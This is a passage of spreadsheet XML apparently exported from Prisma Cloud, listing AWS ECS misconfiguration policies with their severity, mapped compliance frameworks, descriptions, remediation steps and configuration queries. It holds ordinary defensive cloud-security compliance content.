          <t>9f40d30b-97fd-4ec5-827b-f74b50a312b9</t>
        </is>
      </c>
      <c r="AI1861" t="inlineStr">
        <is>
          <t>8ce95833-8811-4ab6-b475-d8c9a59dbca6</t>
        </is>
      </c>
      <c r="AJ1861" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1861" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1862">
      <c r="A1862" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 2), HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), CIS Controls v7.1</t>
        </is>
      </c>
      <c r="B1862" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1862" s="2" t="inlineStr"/>
      <c r="D1862" t="inlineStr"/>
      <c r="E1862" t="inlineStr"/>
      <c r="F1862" t="inlineStr"/>
      <c r="G1862" t="b">
        <v>1</v>
      </c>
      <c r="H18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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1862" t="inlineStr">
        <is>
          <t>aws-ecs</t>
        </is>
      </c>
      <c r="K1862" t="inlineStr">
        <is>
          <t>AWS ECS cluster not configured with active services</t>
        </is>
      </c>
      <c r="L1862" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1862" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1862" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1862" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1862" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1862" t="inlineStr">
        <is>
          <t>Control Category: 10.0</t>
        </is>
      </c>
      <c r="R1862" t="inlineStr">
        <is>
          <t>10.k</t>
        </is>
      </c>
      <c r="S1862" t="inlineStr"/>
      <c r="T1862" t="b">
        <v>0</v>
      </c>
      <c r="U1862" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1862" t="inlineStr">
        <is>
          <t>aws-ecs-cluster</t>
        </is>
      </c>
      <c r="W1862" t="inlineStr">
        <is>
          <t>This policy identifies ECS clusters that are not configured with active services. ECS service enables you to run and maintain a specified number of instances of a task definition simultaneously in an Amazon ECS cluster. It is recommended to remove Idle ECS clusters to reduce the container attack surface or create new services for the reported ECS cluster.
For details:
https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html</t>
        </is>
      </c>
      <c r="X1862" t="inlineStr">
        <is>
          <t>To delete the reported idle ECS Cluster follow below mentioned URL:
https://docs.aws.amazon.com/AmazonECS/latest/developerguide/delete_cluster.html
To create new container services follow below mentioned URL:
https://docs.aws.amazon.com/AmazonECS/latest/developerguide/create-service.html</t>
        </is>
      </c>
      <c r="Y1862" t="inlineStr"/>
      <c r="Z1862" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ecs-cluster' AND json.rule = status equals ACTIVE and activeServicesCount equals 0</t>
        </is>
      </c>
      <c r="AA1862" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1862" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1862" t="inlineStr">
        <is>
          <t>PC-AWS-ECS-715</t>
        </is>
      </c>
      <c r="AD1862" t="b">
        <v>1</v>
      </c>
      <c r="AE1862" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1862" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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2" t="inlineStr">
        <is>
          <t>a8b1af9e-53b3-4b43-91e0-482730ca5ab5</t>
        </is>
      </c>
      <c r="AI1862" t="inlineStr">
        <is>
          <t>d604fbfe-49ae-41ff-9fe8-b8a92d87d0c3</t>
        </is>
      </c>
      <c r="AJ1862" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1862" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1863">
      <c r="A1863" t="inlineStr">
        <is>
          <t>HIPAA, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, Insurance Regulatory And Development Authority Of India, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, Copy of CIS Controls v8, PCI DSS v4.0, FFIEC, MLPS 2.0 (Level 2), SOC 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, DORA, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, ACSC Information Security Manual (ISM), PCI DSS v4.0, TX-RAMP Level 2, HIPAA, PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B1863" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1863" s="2" t="inlineStr"/>
      <c r="D1863" t="inlineStr"/>
      <c r="E1863" t="inlineStr"/>
      <c r="F1863" t="inlineStr"/>
      <c r="G1863" t="b">
        <v>1</v>
      </c>
      <c r="H18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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1863" t="inlineStr">
        <is>
          <t>aws-ecs</t>
        </is>
      </c>
      <c r="K1863" t="inlineStr">
        <is>
          <t>AWS ECS Cluster instance volume encryption for data at rest is disabled</t>
        </is>
      </c>
      <c r="L1863" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1863" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1863" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1863" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1863" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1863" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R1863" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S1863" t="inlineStr"/>
      <c r="T1863" t="b">
        <v>0</v>
      </c>
      <c r="U1863" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1863" t="inlineStr">
        <is>
          <t>aws-ecs-container-instance</t>
        </is>
      </c>
      <c r="W1863" t="inlineStr">
        <is>
          <t>This policy identifies the ECS Cluster instance volumes for which encryption for data at rest is disabled. Encrypting data at rest reduces unintentional exposure of data and prevents unauthorized users from accessing sensitive data on your AWS ECS clusters. It is recommended to configure encryption for your ECS cluster instance volumes using an encryption key.
NOTE: ECS can be launched using ECS Fargate launch type or EC2 Instance. ECS Fargate launch type pulls images from the Elastic Container Registry, which are transmitted over HTTPS and are automatically encrypted at rest using S3 server-side encryption. So this policy is only applicable to ECS launched using EC2 Instances.</t>
        </is>
      </c>
      <c r="X1863" t="inlineStr">
        <is>
          <t>To enable encryption to your ECS Cluster instance volumes, follow below URL:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html
NOTE: The existing EBS volumes or snapshots cannot be encrypted, but when you copy unencrypted snapshots, or restore unencrypted volumes, the resulting snapshots or volumes are encrypted.</t>
        </is>
      </c>
      <c r="Y1863" t="inlineStr"/>
      <c r="Z1863" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ecs-container-instance' AND json.rule = status equals ACTIVE as X; config from cloud.resource where api.name = 'aws-ec2-describe-volumes' AND json.rule = state contains in-use and encrypted is false as Y; filter '$.Y.attachments[*].instanceId contains $.X.ec2InstanceId'; show Y;</t>
        </is>
      </c>
      <c r="AA1863" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1863" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1863" t="inlineStr">
        <is>
          <t>PC-AWS-ECS-745</t>
        </is>
      </c>
      <c r="AD1863" t="b">
        <v>1</v>
      </c>
      <c r="AE1863" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1863" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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3" t="inlineStr">
        <is>
          <t>d00b3874-3bca-43df-b835-34cec48c7f0f</t>
        </is>
      </c>
      <c r="AI1863" t="inlineStr">
        <is>
          <t>d273c110-0e4b-4ca1-8256-327f6ef28d71</t>
        </is>
      </c>
      <c r="AJ1863" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1863" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1864">
      <c r="A1864" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, APRA (CPS 234) Information Security, ISO 27002:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, Fedramp (Moderate), ISO/IEC 27002:2013, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, ISO/IEC 27002:2013, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, ITSG-33, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CyberSecurity Law of the People's Republic of China, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, Copy of CIS Controls v8, CRI Profile v1.2.1, PCI DSS v3.2.1, Risk Management in Technology (RMiT), CyberSecurity Law of the People's Republic of China, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, SOC 2, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, TX-RAMP Level 2, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, MLPS 2.0, Australian Energy Sector Cyber Security Framework (AESCSF), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1864" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1864" s="2" t="inlineStr"/>
      <c r="D1864" t="inlineStr"/>
      <c r="E1864" t="inlineStr"/>
      <c r="F1864" t="inlineStr"/>
      <c r="G1864" t="b">
        <v>1</v>
      </c>
      <c r="H18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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1864" t="inlineStr">
        <is>
          <t>aws-ecs</t>
        </is>
      </c>
      <c r="K1864" t="inlineStr">
        <is>
          <t>AWS ECS Fargate task definition root user found</t>
        </is>
      </c>
      <c r="L1864" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M1864" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1864" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1864" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1864" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1864" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1864" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1864" t="inlineStr"/>
      <c r="T1864" t="b">
        <v>0</v>
      </c>
      <c r="U1864" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1864" t="inlineStr">
        <is>
          <t>aws-ecs-describe-task-definition</t>
        </is>
      </c>
      <c r="W1864" t="inlineStr">
        <is>
          <t>This policy identifies AWS ECS Fargate task definition which has user name as root. As a best practice, the user name to use inside the container should not be root.
Note: This parameter is not supported for Windows containers.</t>
        </is>
      </c>
      <c r="X1864" t="inlineStr">
        <is>
          <t>Create a task definition revision.
1. Open the Amazon ECS console.
2. From the navigation bar, choose the region that contains your task definition.
3. In the navigation pane, choose Task Definitions.
4. On the Task Definitions page, select the box to the left of the task definition to revise and choose Create new revision.
5. On the Create new revision of Task Definition page, change the existing Container Definitions.
6. Under Security, remove root from the User field.
7. Verify the information and choose Update, then Create.
8. If your task definition is used in a service, update your service with the updated task definition.
9. Deactivate previous task definition</t>
        </is>
      </c>
      <c r="Y1864" t="inlineStr"/>
      <c r="Z1864" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ecs-describe-task-definition' AND json.rule =  containerDefinitions[*].user exists and containerDefinitions[*].user contains root</t>
        </is>
      </c>
      <c r="AA1864" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1864" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1864" t="inlineStr">
        <is>
          <t>PC-AWS-ECS-399</t>
        </is>
      </c>
      <c r="AD1864" t="b">
        <v>1</v>
      </c>
      <c r="AE1864" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1864" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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4" t="inlineStr">
        <is>
          <t>0ad8c26b-f3b5-4917-b9a4-057f6c2ddebc</t>
        </is>
      </c>
      <c r="AI1864" t="inlineStr">
        <is>
          <t>797d24e3-edc7-4452-8579-cd5fa9a6463d</t>
        </is>
      </c>
      <c r="AJ1864" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1864" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1865">
      <c r="A1865" t="inlineStr"/>
      <c r="B1865" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1865" s="2" t="inlineStr"/>
      <c r="D1865" t="inlineStr"/>
      <c r="E1865" t="inlineStr"/>
      <c r="F1865" t="inlineStr"/>
      <c r="G1865" t="b">
        <v>1</v>
      </c>
      <c r="H18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65" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1865" t="inlineStr">
        <is>
          <t>aws-ecs</t>
        </is>
      </c>
      <c r="K1865" t="inlineStr">
        <is>
          <t>AWS ECS task definition is not configured with read-only access to container root filesystems</t>
        </is>
      </c>
      <c r="L1865" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1865" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1865" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1865" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1865" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1865" t="inlineStr"/>
      <c r="R1865" t="inlineStr"/>
      <c r="S1865" t="inlineStr"/>
      <c r="T1865" t="b">
        <v>0</v>
      </c>
      <c r="U1865" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1865" t="inlineStr">
        <is>
          <t>aws-ecs-describe-task-definition</t>
        </is>
      </c>
      <c r="W1865" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Elastic Container Service (ECS) task definitions with readonlyRootFilesystem parameter set to false or if the parameter does not exist in the container definition within the task definition.
ECS root filesystem is the base filesystem that containers run on, providing the necessary environment and isolation for the containerized application.
If a containerized application is compromised, it could enable an attacker to alter the root file system of the host machine, thus compromising the entire system or application. This could lead to significant data loss, system crashes, or a broader security breach. 
It is recommended to limit all ECS containers to have read-only access on ECS task definition to limit the potential impact of a compromised container.</t>
        </is>
      </c>
      <c r="X1865" t="inlineStr">
        <is>
          <t>To limit ECS task definitions to read-only access to root filesystems, perform the following actions:
1. Sign into the AWS console and navigate to the Amazon ECS console
2. In the navigation pane, choose 'Task definitions'
3. Choose the task definition that is reported
4. Select 'Create new revision', and then click on 'Create new revision'
5. On the 'Create new task definition revision' page, select the container with Read-only root file system disabled
6. Under the 'Read-only root file system' section, enable 'Read only'
7. Specify the remaining configuration as per the requirements
8. Choose 'Create' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-336
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-336</t>
        </is>
      </c>
      <c r="Y1865" t="inlineStr"/>
      <c r="Z1865" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ecs-describe-task-definition' AND json.rule = status equals "ACTIVE" AND containerDefinitions[*].readonlyRootFilesystem any false or containerDefinitions[*].readonlyRootFilesystem does not exist
{"category":"General","resourceTypes":["aws_ecs_task_definition"]}</t>
        </is>
      </c>
      <c r="AA1865" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1865" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1865" t="inlineStr">
        <is>
          <t>PC-AWS-ECS-1231-CKV_AWS_336</t>
        </is>
      </c>
      <c r="AD1865" t="b">
        <v>1</v>
      </c>
      <c r="AE1865" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1865" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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65" t="inlineStr">
        <is>
          <t>b7ea61ce-89ad-43b0-8134-45e3b7f537eb</t>
        </is>
      </c>
      <c r="AI1865" t="inlineStr">
        <is>
          <t>3215813a-f857-45b9-b6bc-f2ae2cce8b41</t>
        </is>
      </c>
      <c r="AJ1865" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1865" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1866">
      <c r="A1866" t="inlineStr">
        <is>
          <t>ITSG-33, Microsoft Cloud Security Benchmark v1, NYDFS 23 CRR-NY 500.0, GDPR, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, TX-RAMP Level 2, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B1866" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1866" s="2" t="inlineStr"/>
      <c r="D1866" t="inlineStr"/>
      <c r="E1866" t="inlineStr"/>
      <c r="F1866" t="inlineStr"/>
      <c r="G1866" t="b">
        <v>1</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1866" t="inlineStr">
        <is>
          <t>aws-ecs</t>
        </is>
      </c>
      <c r="K1866" t="inlineStr">
        <is>
          <t>AWS ECS task definition logging configuration disabled</t>
        </is>
      </c>
      <c r="L1866" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1866" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1866" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1866" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1866" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1866" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R1866" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S1866" t="inlineStr"/>
      <c r="T1866" t="b">
        <v>0</v>
      </c>
      <c r="U1866" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1866" t="inlineStr">
        <is>
          <t>aws-ecs-describe-task-definition</t>
        </is>
      </c>
      <c r="W1866" t="inlineStr">
        <is>
          <t>This policy identifies AWS ECS task definitions that have logging configuration disabled.
AWS ECS logging involves capturing and storing container logs for monitoring, troubleshooting, and analysis purposes within the Amazon ECS environment. Collecting data from task definitions gives visibility, which can aid in debugging processes and determining the source of issues.
It is recommended to configure logging for an AWS ECS task definition.</t>
        </is>
      </c>
      <c r="X1866" t="inlineStr">
        <is>
          <t>To enable log configuration for your Amazon ECS task definitions, follow these steps:
1. Sign into the AWS console and navigate to the Amazon ECS console
2. In the navigation pane, choose 'Task definitions'
3. Choose the task definition to be updated
4. Select 'Create new revision', and then click on 'Create new revision'.
5. On the 'Create new task definition revision' page, select the container with logging configuration disabled
6. Under the 'Logging' section, enable 'Use log collection'
7. Select the log driver to be used under the dropdown
8. At 'awslogs-group', specify the log group that the logdriver sends its log streams to
9. Specify the remaining configuration as per the requirements
10. Choose 'Update'.</t>
        </is>
      </c>
      <c r="Y1866" t="inlineStr"/>
      <c r="Z1866" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ecs-describe-task-definition' AND json.rule = status equals ACTIVE and containerDefinitions[?any(logConfiguration.logDriver does not exist)] exists</t>
        </is>
      </c>
      <c r="AA1866" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1866" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1866" t="inlineStr">
        <is>
          <t>PC-AWS-ECS-1162</t>
        </is>
      </c>
      <c r="AD1866" t="b">
        <v>1</v>
      </c>
      <c r="AE1866" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1866" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>6d75632d-4566-4405-ad77-c9e3e03383fc</t>
        </is>
      </c>
      <c r="AI1866" t="inlineStr">
        <is>
          <t>c2224f8e-3617-4cbc-b7f1-2ff76d5d2937</t>
        </is>
      </c>
      <c r="AJ1866" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1866" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1867">
      <c r="A1867" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 2), HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), CIS Controls v7.1</t>
        </is>
      </c>
      <c r="B1867" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1867" s="2" t="inlineStr"/>
      <c r="D1867" t="inlineStr"/>
      <c r="E1867" t="inlineStr"/>
      <c r="F1867" t="inlineStr"/>
      <c r="G1867" t="b">
        <v>0</v>
      </c>
      <c r="H18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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1867" t="inlineStr">
        <is>
          <t>aws-ecs</t>
        </is>
      </c>
      <c r="K1867" t="inlineStr">
        <is>
          <t>AWS ECS cluster not configured with a registered instance</t>
        </is>
      </c>
      <c r="L1867" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1867" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1867" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1867" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1867" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1867" t="inlineStr">
        <is>
          <t>Control Category: 10.0</t>
        </is>
      </c>
      <c r="R1867" t="inlineStr">
        <is>
          <t>10.k</t>
        </is>
      </c>
      <c r="S1867" t="inlineStr"/>
      <c r="T1867" t="b">
        <v>0</v>
      </c>
      <c r="U1867" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1867" t="inlineStr">
        <is>
          <t>aws-ecs-service</t>
        </is>
      </c>
      <c r="W1867" t="inlineStr">
        <is>
          <t>This policy identifies ECS clusters that are not configured with a registered instance. ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster. It is recommended to remove Idle ECS clusters to reduce the container attack surface or register a new instance for the reported ECS cluster.
For details:
https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ECS_instances.html</t>
        </is>
      </c>
      <c r="X1867" t="inlineStr">
        <is>
          <t>To delete the reported idle ECS Cluster follow below mentioned URL:
https://docs.aws.amazon.com/AmazonECS/latest/developerguide/delete_cluster.html
To register a new instance for reported ECS Cluster follow below mentioned URL:
https://docs.aws.amazon.com/AmazonECS/latest/developerguide/launch_container_instance.html</t>
        </is>
      </c>
      <c r="Y1867" t="inlineStr"/>
      <c r="Z1867" t="inlineStr">
        <is>
